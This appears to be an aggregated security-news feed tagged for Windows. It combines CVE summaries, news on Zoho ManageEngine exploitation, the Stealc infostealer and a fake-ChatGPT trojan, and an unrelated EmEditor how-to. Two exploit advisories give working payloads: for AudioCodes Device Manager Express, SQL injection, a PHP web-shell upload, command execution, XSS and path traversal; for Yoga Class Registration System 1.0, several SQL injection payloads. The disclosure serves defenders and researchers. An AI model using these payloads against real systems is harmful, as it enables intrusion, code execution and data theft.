Clash for Windows v0.20.12 was discovered to contain a remote code execution (RCE) vulnerability which is exploited via overwriting the configuration file (cfw-setting.yaml).

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

CVE-2023-24205: GitHub - Fndroid/clash_for_windows_pkg: A Windows/macOS GUI based on Clash

Device Manager Express versions 7.8.20002.47752 and below suffer from code execution, command execution, cross site scripting, remote SQL injection, and traversal vulnerabilities.

# Product Name: Device Manager Express  
# Vendor Homepage: https://www.audiocodes.com  
# Software Link:  
https://www.audiocodes.com/solutions-products/products/management-products-solutions/device-manager  
# Version: <= 7.8.20002.47752  
# Tested on: Windows 10 / Server 2019  
# Default credentials: admin/admin  
# CVE-2022-24627, CVE-2022-24628, CVE-2022-24629, CVE-2022-24630,  
CVE-2022-24631, CVE-2022-24632  
# Exploit: https://github.com/00xEF/Audiocodes-Device-Manager-Express

AudioCodes' Device Manager Express features a user interface that enables  
enterprise network administrators to set up, configure and update up to 500  
400HD Series IP phones in globally distributed corporations.

----------------  
CVE-2022-24627: An unauthenticated SQL injection exists in the p parameter  
of the login form.  
----------------  
POST /admin/AudioCodes_files/process_login.php HTTP/1.1  
Host: 10.11.12.13  
".." omitted  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0)  
Content-Type: application/x-www-form-urlencoded

username=admin&password=&domain=&p=%5C%27or+1%3D1%23

----------------  
CVE-2022-24628: An authenticated SQL injection exists in the id parameter  
of IPPhoneFirmwareEdit.php  
----------------  
/admin/AudioCodes_files/IPPhoneFirmwareEdit.php?action=download&id=-1338'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-

----------------  
CVE-2022-24629: A remote code execution vulnerability exists via path  
traversal in the dir parameter of the file upload functionality .  
----------------  
POST /admin/AudioCodes_files/BrowseFiles.php?type= HTTP/1.1  
Host: 10.11.12.13  
".." omitted  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0)

-----------------------------119140522224988540294045582807  
Content-Disposition: form-data; name="dir"

C:/audiocodes/express/WebAdmin/admin/AudioCodes_files/ajax/  
-----------------------------119140522224988540294045582807  
Content-Disposition: form-data; name="type"

-----------------------------119140522224988540294045582807  
Content-Disposition: form-data; name="myfile"; filename="ajaxJabra.php"  
Content-Type: application/x-php

<?php echo shell_exec($_GET['x']); ?>

-----------------------------119140522224988540294045582807  
Content-Disposition: form-data; name="Submit"

Upload  
-----------------------------119140522224988540294045582807--

----------------  
CVE-2022-24630: A remote command execution exists in an undocumented eval  
function in BrowseFiles.php  
----------------  
POST /admin/AudioCodes_files/BrowseFiles.php?cmd=ssh HTTP/1.1  
Host: 10.11.12.13  
".." omitted  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0)

ssh_command=dir+C:

----------------  
CVE-2022-24631: A Persistent Cross-Site Scripting exists in the desc  
parameter in ajaxTenants.php  
----------------  
POST /admin/AudioCodes_files/ajax/ajaxTenants.php HTTP/1.1  
Host: 10.11.12.13  
".." omitted  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0)

action=save&id=1&name=Default&desc=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(1)%3E&subnet=&isdefault=true

----------------  
CVE-2022-24632: A path traversal vulnerability exists in the view parameter  
of the file download functionality in BrowseFiles.php  
----------------  
/admin/AudioCodes_files/BrowseFiles.php?view=C:/windows/win.ini

Device Manager Express 7.8.20002.47752 SQL Injection / XSS / Code Execution / Traversal

Yoga Class Registration System version 1.0 suffers from multiple remote SQL injection vulnerabilities.

    # Exploit Title: Authenticated POST based SQL Injection when delete user on Yoga Class Registration System# Google Dork: NA# Date: 23/2/2023# Exploit Author: Ahmed Ismail (@MrOz1l)# Vendor Homepage: https://www.sourcecodester.com/php/16097/yoga-class-registration-system-php-and-mysql-free-source-code.html# Software Link: [download link if available]# Version: 1.0# CVE: [CVE-2023-0982]# Tested on: Windows 11# PayloadGET /php-ycrs/admin/registrations/update_status.php?id=2'+AND+(SELECT+7828+FROM+(SELECT(SLEEP(3)))Mvkn)--+yLjU HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/110.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestConnection: closeReferer:http://localhost/php-ycrs/admin/?page=registrations/view_registration&id=2Cookie: PHPSESSID=tcc4d9ffr86hm2dqlfmos7amhgSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-origin##Payload'+AND+(SELECT+7828+FROM+(SELECT(SLEEP(3)))Mvkn)--+yLjUthe back-end DBMS is MySQLweb application technology: PHP 8.0.25, Apache 2.4.54back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)# Exploit Title: Authenticated POST based SQL Injection when delete user on Yoga Class Registration System# Google Dork: NA# Date: 23/2/2023# Exploit Author: Ahmed Ismail (@MrOz1l)# Vendor Homepage: https://www.sourcecodester.com/php/16097/yoga-class-registration-system-php-and-mysql-free-source-code.html# Software Link: [download link if available]# Version: 1.0# CVE: ( CVE-2023-0981 )# Tested on: Windows 11```POST /php-ycrs/classes/Master.php?f=delete_class HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/110.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 6Origin: http://localhostConnection: closeReferer: http://localhost/php-ycrs/admin/?page=classesCookie: PHPSESSID=tcc4d9ffr86hm2dqlfmos7amhgSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originid=96'```# PayloadParameter: id (POST)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause (subquery -comment)    Payload: id=96' AND 2307=(SELECT (CASE WHEN (2307=2307) THEN 2307 ELSE(SELECT 8487 UNION SELECT 3172) END))-- -    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUPBY clause (FLOOR)    Payload: id=96' AND (SELECT 4409 FROM(SELECTCOUNT(*),CONCAT(0x7162707671,(SELECT(ELT(4409=4409,1))),0x71716b6b71,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- NiQL    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: id=96' AND (SELECT 9070 FROM (SELECT(SLEEP(5)))jayu)-- wkzQ# Exploit Title: Authenticated POST based SQL Injection when add class on Yoga Class Registration System# Google Dork: NA# Date: 23/2/2023# Exploit Author: Ahmed Ismail (@MrOz1l)# Vendor Homepage: https://www.sourcecodester.com/php/16097/yoga-class-registration-system-php-and-mysql-free-source-code.html# Software Link: [download link if available]# Version: 1.0# CVE: ( CVE-2023-0982 )# Tested on: Windows 11##PayloadPOST /php-ycrs/classes/Master.php?f=save_registration HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/110.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestContent-Type: multipart/form-data;boundary=---------------------------408548517113152447833471217322Content-Length: 286Origin: http://localhostConnection: closeReferer:http://localhost/php-ycrs/admin/?page=registrations/view_registration&id=2Cookie: PHPSESSID=tcc4d9ffr86hm2dqlfmos7amhgSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-origin-----------------------------408548517113152447833471217322Content-Disposition: form-data; name="id"2'-----------------------------408548517113152447833471217322Content-Disposition: form-data; name="status"1-----------------------------408548517113152447833471217322--##Payload'+AND+(SELECT+7828+FROM+(SELECT(SLEEP(3)))Mvkn)--+yLjUthe back-end DBMS is MySQLweb application technology: PHP 8.0.25, Apache 2.4.54back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)

Yoga Class Registration System 1.0 SQL Injection

Multiple threat actors have been observed opportunistically weaponizing a now-patched critical security vulnerability impacting several Zoho ManageEngine products since January 20, 2023.
Tracked as CVE-2022-47966 (CVSS score: 9.8), the remote code execution flaw allows a complete takeover of the susceptible systems by unauthenticated attackers.
As many as 24 different products, including Access

Multiple threat actors have been observed opportunistically weaponizing a now-patched critical security vulnerability impacting several Zoho ManageEngine products since January 20, 2023.

Tracked as **CVE-2022-47966** (CVSS score: 9.8), the remote code execution flaw allows a complete takeover of the susceptible systems by unauthenticated attackers.

As many as 24 different products, including Access Manager Plus, ADManager Plus, ADSelfService Plus, Password Manager Pro, Remote Access Plus, and Remote Monitoring and Management (RMM), are affected by the issue.

The shortcoming "allows unauthenticated remote code execution due to usage of an outdated third-party dependency for XML signature validation, Apache Santuario," Bitdefender's Martin Zugec said in a technical advisory shared with The Hacker News.

According to the Romanian cybersecurity firm, the exploitation efforts are said to have commenced the day after penetration testing firm Horizon3.ai released a proof-of-concept (PoC) last month.

A majority of the attack victims are located in Australia, Canada, Italy, Mexico, the Netherlands, Nigeria, Ukraine, the U.K., and the U.S.

The main objective of the attacks detected to date revolves around deploying tools on vulnerable hosts such as Netcat and Cobalt Strike Beacon.

Some intrusions have leveraged the initial access to install AnyDesk software for remote access, while a few others have attempted to install a Windows version of a ransomware strain known as Buhti.

What's more, there is evidence of a targeted espionage operation, with the threat actors abusing the ManageEngine flaw to deploy malware capable of executing next-stage payloads.

"This vulnerability is another clear reminder of the importance of keeping systems up to date with the latest security patches while also employing strong perimeter defense," Zugec said.

"Attackers don't need to scour for new exploits or novel techniques when they know that many organizations are vulnerable to older exploits due, in part, to the lack of proper patch management and risk management."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Experts Sound Alarm Over Growing Attacks Exploiting Zoho ManageEngine Products

ThingsBoard 3.4.1 could allow a remote attacker to gain elevated privileges because hard-coded service credentials (usable for privilege escalation) are stored in an insecure format. (To read this stored data, the attacker needs access to the application server or its source code.)

CVE-2023-26462: ThingsBoard Release Notes

By Deeba Ahmed
Dubbed "Stealc" by researchers, the malware is also being promoted on several Russian language hacker and cybercrime forums on the clear net, in addition to the dark web.
This is a post from HackRead.com Read the original post: Hackers Advertising New Info-Stealing Malware on Dark Web

As of now, the Stealc malware targets only Windows devices and steals data from browsers, cryptocurrency wallets, messengers, and email clients.

Cybersecurity researchers from Sekoia have released details of new information-stealing malware called Stealc which has surfaced on several underground hacking forums and on the **Dark Web**.

According to researchers, a threat actor using the alias “Plymouth” has developed the malware and is advertising it on the dark web. This malware is different, as it simultaneously steals data from its victims and customers. It is also being promoted on **Telegram channels**.

The malware developer offering free samples for the malware on a Russian forum (Credit: Sekoia)

The threat actor stated that Stealc, currently at version 1.3.0, is fully featured and ready-to-use malware. It is not built from scratch but is based on other popular information-stealing malware such as **Racoon**, **Vidar**, and **Redline Stealer**. The malware is continually being upgraded; according to the researchers, it is tweaked every week. It was first spotted in January 2023.

**How Does it work?**

After it is installed on the target’s PC, the malware starts an anti-analysis check to ensure it isn’t running on a sandbox or a virtual environment. It loads Windows API functions and establishes a connection with the C2 center. It sends the attacker’s hardware identifier and device build name, after which the malware receives commands.

According to Sekoia’s **blog post**, this is when the malware starts collecting data from the browsers, extensions, and applications and executes its file grabber to exfiltrate all files to the C2 server. Once the entire data is stolen, Stealc self-erases and downloaded DLL files are removed from the device to avoid detection.

**Stealc Capabilities**

Some of Stealc’s features include a C2 center URL randomizer and an advanced log sorting and searching system. Moreover, the malware spares victims from Ukraine, uses legitimate third-party DLLs, and abuses Windows API functions. It is written in C and automatically exfiltrates data without requiring any interference from the attacker.

The malware can target 75 plugins, 22 browsers, and 25 desktop wallets. Furthermore, it can hide most of its strings using base64 and RC4.

**Stealc is Popular among Cybercriminals**

Apart from advertising it on the **Dark Web**, the threat actor also deploys the malware on target endpoints by creating fake YouTube tutorials about cracking software. Or by offering links in the description, which deploys the info-stealer instead of the offered crack.

Researchers discovered over 40 C2 servers, leading them to conclude that Stealc is gaining traction quickly. Therefore, it is vital to make sure your security software is updated regularly and to avoid downloading and installing software from suspicious or unauthorized sources. Also, never open links or attachments from unknown sources.

1.  **Dark Web Search Engines and How to Find Them**
2.  **Hackers selling Bitcoin ATM Malware on Dark Web**
3.  **Zombinder on Dark Web Adds Malware to Legit Apps**
4.  **Web Webinjects Marketplace “In The Box” Discovered**
5.  **L0rdix malware on dark web steals data, mines crypto**

Hackers Advertising New Info-Stealing Malware on Dark Web

Hackers will take anything newsworthy and turn it against you, including the world's most advanced AI-enabled chatbot.

Scammers are capitalizing on the runaway popularity of and interest in ChatGPT, the natural language processing AI — impersonating it in order to infect victims with a Trojan malware called Fobo, in order to steal login credentials for business accounts.

ChatGPT is the world's most advanced chatbot, published by developers OpenAI back in November. It’s been a resounding success: It's regularly overloaded with users demanding that it write marketing copy, or poems, or answer questions about philosophy. (In fact, OpenAI has developed a $20-per-month subscription plan for users who want to bypass these slowdowns.) And a meme has been making the Internet rounds recently, about how long it took the world's biggest apps to reach 1 million users. Netflix, for example, took 3.5 years. Facebook, 10 months. Spotify, five months. ChatGPT? Five days.

In the same way they do any big news item — COVID-19, the Ukraine war, take your pick — hackers have twisted the popularity of ChatGPT into phishing bait. And now, according to a blog post from Kaspersky, a fresh campaign is utilizing social media impersonation to lead unsuspecting victims to a fake ChatGPT landing page, where "signing up" means downloading an info-stealing Trojan called Fobo. The Trojan seeks out business account credentials, which could be used for follow-on attacks of a greater scale.

According to the report, this blatant scam has already spread to Africa, the Americas, Asia, and Europe.

**Faking ChatGPT to Hack Business Accounts**

The researchers at Kaspersky have observed grifters running social media accounts that either impersonate the OpenAI/ChatGPT brand directly or pretend to be communities for fans of the program.

Sometimes, the accounts post neutral content relating to ChatGPT, with a malicious link at the bottom. Other times, according to the blog post, they post "fake credentials for the pre-created accounts that are said to provide access to ChatGPT. To motivate potential users even further, the attackers say that each account already has US $50 on its balance, which can be spent on using the chatbot."

The real program has an entirely optional subscription plan but is otherwise free to use for the general public.

Unwitting social media users who follow the malicious links in these posts land on a ChatGPT homepage, which is like for like with the real thing in almost every way.

A convincing fake ChatGPT. Source: Kaspersky

Clicking the "download" button — suspicious in itself, as ChatGPT has no desktop client — triggers the installation of an executable file.

"If this archive is unpacked and the executable file run," according to Kaspersky researchers, "then, depending on the version of Windows, the user sees either a message saying installation failed for some reason, or no message at all — at which point the process seems to end."

Behind the scenes, however, a Trojan horse has been unleashed. The Trojan looks for login credentials for apps like Google, Facebook, and TikTok, stored in the victim's browser. But in particular, Kaspersky explained, it's looking for usernames and passwords for business accounts.

With employee usernames and passwords, the attackers could possibly perform more significant follow-on attacks against enterprises.

"On finding a business account in one of these services," the researchers explained, "it tries to get additional information, such as how much money was spent on advertising from the account and what its current balance is."

**How to Avoid ChatGPT Scams**

That the perpetrators of this campaign chose ChatGPT as their vehicle is no coincidence. Among its many more frivolous uses, the chatbot has proven popular in business settings. Employees are using it to write emails, copy, and marketing materials faster, support interviews and research projects, and much more.

To avoid engaging with a malicious fake, though, Kaspersky recommended avoiding "offers" like those from this story, utilizing security software, and not clicking on links — better to go through a search engine or type the URL straight into your browser.

As of this writing, Kaspersky has not responded to a direct request for comment by Dark Reading. So, in substitute, we asked the ChatGPT bot to provide insight on the matter. It had this to say:

_"In conclusion, the rise of hackers impersonating ChatGPT to steal login credentials is a serious threat that should not be underestimated. The implications of such attacks are far-reaching and potentially devastating for individuals, organizations, and even entire industries. As technology continues to evolve, we can expect these types of attacks to become more sophisticated and difficult to detect. It is, therefore, imperative that individuals and organizations take proactive measures to protect themselves, such as regularly changing passwords, enabling two-factor authentication, and staying vigilant for signs of phishing attacks. Only by working together and taking these steps can we hope to mitigate the risks posed by hackers impersonating ChatGPT and other forms of cybercrime in the future."_

Scammers Mimic ChatGPT to Steal Business Credentials

A Path Traversal in setup.php in OpenEMR < 7.0.0 allows remote unauthenticated users to read arbitrary files by controlling a connection to an attacker-controlled MySQL server.

CVE-2023-22974: OpenEMR Patches - OpenEMR Project Wiki

By Waqas
If you use EmEditor, this user-friendly tutorial will explain how to remove duplicate lines in the popular EmEditor text editor software.
This is a post from HackRead.com Read the original post: How to Remove Duplicate Lines in EmEditor (2023)

EmEditor is a smart text editor software for Windows that supports a wide range of file formats, including plain text files, programming languages, Unicode, and large files.

EmEditor is developed by Emurasoft, Inc. The brain behind creating EmEditor is Emurasoft’s president Yutaka Emura who is based in the United States. Emura is also known for developing the EmTerm communication program.

EmEditor offers various features, including syntax highlighting, code folding, regular expressions, macros, multiple document support, and more.

EmEditor also supports plugins that extend its functionality and can be used for advanced tasks such as code debugging, web development, and text manipulation. It is available in both free and paid versions, with the paid version providing additional features and capabilities for power users.

**How to Remove Duplicate Lines in EmEditor?**

Although EmEditor is user-friendly software, with loads of options and features, it is not easy to find a quick solution at once. Therefore, we have decided to break down for our readers how they can remove duplicate lines in EmEditor.

To remove duplicate lines in EmEditor, you can follow these steps:

*   Open the document in EmEditor.
*   Select the lines that you want to remove duplicates from.
*   Click on the “Sort” button on the toolbar or go to the “Sort” menu and choose “Sort Ascending” or “Sort Descending“. This will arrange the selected lines in alphabetical or reverse alphabetical order.
*   After sorting the lines, go to the “Edit” menu and select “Remove Duplicate Lines“. This will remove all the duplicate lines from the selected lines.

Alternatively, you can also use EmEditor’s built-in macro to remove duplicate lines. Here are the steps:

*   Open the document in EmEditor.
*   Press “Ctrl + Shift +R” to open the “Record Micro” dialog box.
*   Enter a name for the macro and click “OK“.
*   Go to the “Edit” menu and select “Remove Duplicate Lines“.
*   Press “Ctrl + Shift +R” again to stop recording the macro.
*   Go to the “Macro” menu and select “Save” to save the macro.
*   To run the macro, go to the “Macro” menu and select the macro you just created.

If this How-To was helpful, don’t forget to share it, and let us know which other How-To you’d like to see us work on.

1.  Crucial Tips for Secure Form Submissions
2.  How to Craft Rich Data-Driven Infographics
3.  How to Dual Boot Android and Windows Easily
4.  How to Create ISO Files from Discs – 3 Best Ways
5.  How to Optimize Your Database Storage in MySQL
6.  How to configure cPanel and WHM Panel on your VPS
7.  MySQL Performance Tuning: Tips for Blazing Fast Queries

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

How to Remove Duplicate Lines in EmEditor (2023)

Use after free in WebRTC in Google Chrome on Windows prior to 110.0.5481.177 allowed a remote attacker who convinced the user to engage in specific UI interactions to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

Tag

#windows